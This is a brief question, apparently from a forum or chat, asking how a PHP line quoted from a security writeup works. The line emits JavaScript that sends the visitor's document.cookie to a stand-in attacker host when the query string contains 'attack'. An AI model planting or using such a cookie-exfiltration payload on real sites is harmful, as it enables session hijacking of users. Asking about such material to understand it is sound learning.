Hi,
can you explain this line from the writeup?

if (strpos( $_SERVER [ 'QUERY_STRING' ], 'attack' ) !== FALSE ) { die ( 'location="https://attacker.tld/?c="+document.cookie;' ); }

How is that used?